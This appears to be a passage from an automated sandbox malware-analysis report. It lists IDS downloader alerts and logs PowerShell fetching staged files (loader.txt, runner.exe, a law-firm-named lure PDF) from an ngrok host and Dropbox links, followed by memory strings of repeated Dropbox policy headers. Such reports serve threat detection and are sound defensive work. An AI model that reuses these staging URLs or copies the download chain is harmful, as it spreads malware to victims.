                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49726 -> 162.125.69.18:443
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49816 -> 162.125.69.18:443
                      Source: global trafficHTTP traffic detected: GET /api/secure/147a893e0e699b17117c599fde51f7ef HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.appConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /scl/fi/u9gqxhe9ae7eoc4nj5zgg/secure.txt?rlkey=81b4cx59cxmphht7wgm6rjb5m&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.dropbox.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /cd/0/get/CgA8JuLWs7OjpVcFSgSqCoN1g_Tobb4iAfwkVoRbgR9qbAMmbxyAidqJNIi7Huw-hcGBD0ufTwW6CHbX0n9FQnC0MuzybQiO6NPUmvJaYNL-OcXb4tP6ZNkzf0t3vICLxdb6nduGvjzFLP1Hq4Rt5zOm/file?dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: uc4d30225f32433b48811132b259.dl.dropboxusercontent.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /scl/fi/p8f846myv0cbs5975uszw/loader.txt?rlkey=xzx17r7jhir5r28db7j4zb4sl&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.dropbox.com
                      Source: global trafficHTTP traffic detected: GET /cd/0/get/CgDuChhAhq4ymWrN2fW3pQFL0ERw62yLj1sISkvYJvyGBBxrec-guM6espnuVHhttXVGn6x43Swr7_AEalUXvAd4pMNhp6sfpbvTO6u9T55U_zuSnk9EfpX_z6ewBA9S4itVeH11I07C35wE49n3aa_d/file?dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: ucd57596f8d364d44e08f9d877ad.dl.dropboxusercontent.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1 HTTP/1.1Host: www.dropbox.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /cd/0/get/CgBrJd1x-qTfcYXPFE412Lis9q-HoFjumzxgzf722Qj69a3uFoFqnlbsZRkn8vQ_nLbyvaG5NlGdxNb0UjoSKS71nM_-VEJfe_G56No2MUYUk95bQqHXVH1-Bg1JW2zoiYuYNgDINgW4MUaIg2fzF5vd/file?dl=1 HTTP/1.1Host: uc7569213660364555d096b4af3d.dl.dropboxusercontent.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.dropbox.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /cd/0/get/CgC-FVFNHj6mqbOCsWuKDQilGp00CAeDNPmt-bZ3x8XPmIdM1Gff0PUUzgtHwNFtYvOTBVQLaPsAbb8LxWMDvSMfhwxywu7khFBduFrJ0cm3W5965j-gmYhSIWCGqvXZlz9A27yw1_Kt1KWTsiDmfIgs/file?dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: uc48e2941acfa6a5a3120fc63e2c.dl.dropboxusercontent.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /scl/fi/qzqf3fr40w71dq8uwcnec/runner.exe?rlkey=dfl8hxamjpp5zdy8yzn5ejrol&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.dropbox.com
                      Source: global trafficHTTP traffic detected: GET /cd/0/get/CgBXr9toUXs-m3mhJIMBILhUZM6kIqyZ-YXP6mPRPYoNEJlTTyTrrqFUDwDxcBR6zyCWH374VEAZBXmMLPRhA0UAObkL1JGp1CBYzkG8jZxF3jQN8zo1HYxFMKGc8L1zhl2bVNIEcZ8JNNk8CQawjHet/file?dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: ucc1d7dedeb5cc8b75fe1d66e216.dl.dropboxusercontent.comConnection: Keep-Alive
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: global trafficHTTP traffic detected: GET /api/secure/147a893e0e699b17117c599fde51f7ef HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.appConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /scl/fi/u9gqxhe9ae7eoc4nj5zgg/secure.txt?rlkey=81b4cx59cxmphht7wgm6rjb5m&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.dropbox.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /cd/0/get/CgA8JuLWs7OjpVcFSgSqCoN1g_Tobb4iAfwkVoRbgR9qbAMmbxyAidqJNIi7Huw-hcGBD0ufTwW6CHbX0n9FQnC0MuzybQiO6NPUmvJaYNL-OcXb4tP6ZNkzf0t3vICLxdb6nduGvjzFLP1Hq4Rt5zOm/file?dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: uc4d30225f32433b48811132b259.dl.dropboxusercontent.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /scl/fi/p8f846myv0cbs5975uszw/loader.txt?rlkey=xzx17r7jhir5r28db7j4zb4sl&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.dropbox.com
                      Source: global trafficHTTP traffic detected: GET /cd/0/get/CgDuChhAhq4ymWrN2fW3pQFL0ERw62yLj1sISkvYJvyGBBxrec-guM6espnuVHhttXVGn6x43Swr7_AEalUXvAd4pMNhp6sfpbvTO6u9T55U_zuSnk9EfpX_z6ewBA9S4itVeH11I07C35wE49n3aa_d/file?dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: ucd57596f8d364d44e08f9d877ad.dl.dropboxusercontent.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1 HTTP/1.1Host: www.dropbox.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /cd/0/get/CgBrJd1x-qTfcYXPFE412Lis9q-HoFjumzxgzf722Qj69a3uFoFqnlbsZRkn8vQ_nLbyvaG5NlGdxNb0UjoSKS71nM_-VEJfe_G56No2MUYUk95bQqHXVH1-Bg1JW2zoiYuYNgDINgW4MUaIg2fzF5vd/file?dl=1 HTTP/1.1Host: uc7569213660364555d096b4af3d.dl.dropboxusercontent.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.dropbox.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /cd/0/get/CgC-FVFNHj6mqbOCsWuKDQilGp00CAeDNPmt-bZ3x8XPmIdM1Gff0PUUzgtHwNFtYvOTBVQLaPsAbb8LxWMDvSMfhwxywu7khFBduFrJ0cm3W5965j-gmYhSIWCGqvXZlz9A27yw1_Kt1KWTsiDmfIgs/file?dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: uc48e2941acfa6a5a3120fc63e2c.dl.dropboxusercontent.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /scl/fi/qzqf3fr40w71dq8uwcnec/runner.exe?rlkey=dfl8hxamjpp5zdy8yzn5ejrol&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.dropbox.com
                      Source: global trafficHTTP traffic detected: GET /cd/0/get/CgBXr9toUXs-m3mhJIMBILhUZM6kIqyZ-YXP6mPRPYoNEJlTTyTrrqFUDwDxcBR6zyCWH374VEAZBXmMLPRhA0UAObkL1JGp1CBYzkG8jZxF3jQN8zo1HYxFMKGc8L1zhl2bVNIEcZ8JNNk8CQawjHet/file?dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: ucc1d7dedeb5cc8b75fe1d66e216.dl.dropboxusercontent.comConnection: Keep-Alive
                      Source: powershell.exe, 00000004.00000002.1571110372.00000205803AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: &1NPolicy: object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; img-src https://* data: blob: ; media-src https://* blob: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; base-uri 'self' ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; frame-ancestors 'self' https://*.dropbox.com ; font-src https://* data: ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: equals www.yahoo.com (Yahoo)
                      Source: powershell.exe, 00000011.00000002.1724766561.000001E54E4C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Policy: default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; media-src https://* blob: ; img-src https://* data: blob: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; font-src https://* data: ; frame-ancestors 'self' https://*.dropbox.com ; base-uri 'self' ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker equals www.yahoo.com (Yahoo)
                      Source: powershell.exe, 00000011.00000002.1724766561.000001E54E547000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Policy: img-src https://* data: blob: ; font-src https://* data: ; media-src https://* blob: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; base-uri 'self' ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; frame-ancestors 'self' https://*.dropbox.com ; child-src https://www.dropbox.com/static/serviceworker/ blob: equals www.yahoo.com (Yahoo)
                      Source: powershell.exe, 00000011.00000002.1724766561.000001E54E4A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; media-src https://* blob: ; img-src https://* data: blob: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; font-src https://* data: ; frame-ancestors 'self' https://*.dropbox.com ; base-uri 'self' ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker equals www.yahoo.com (Yahoo)
                      Source: powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; media-src https://* blob: ; img-src https://* data: blob: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; font-src https://* data: ; frame-ancestors 'self' https://*.dropbox.com ; base-uri 'self' ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ 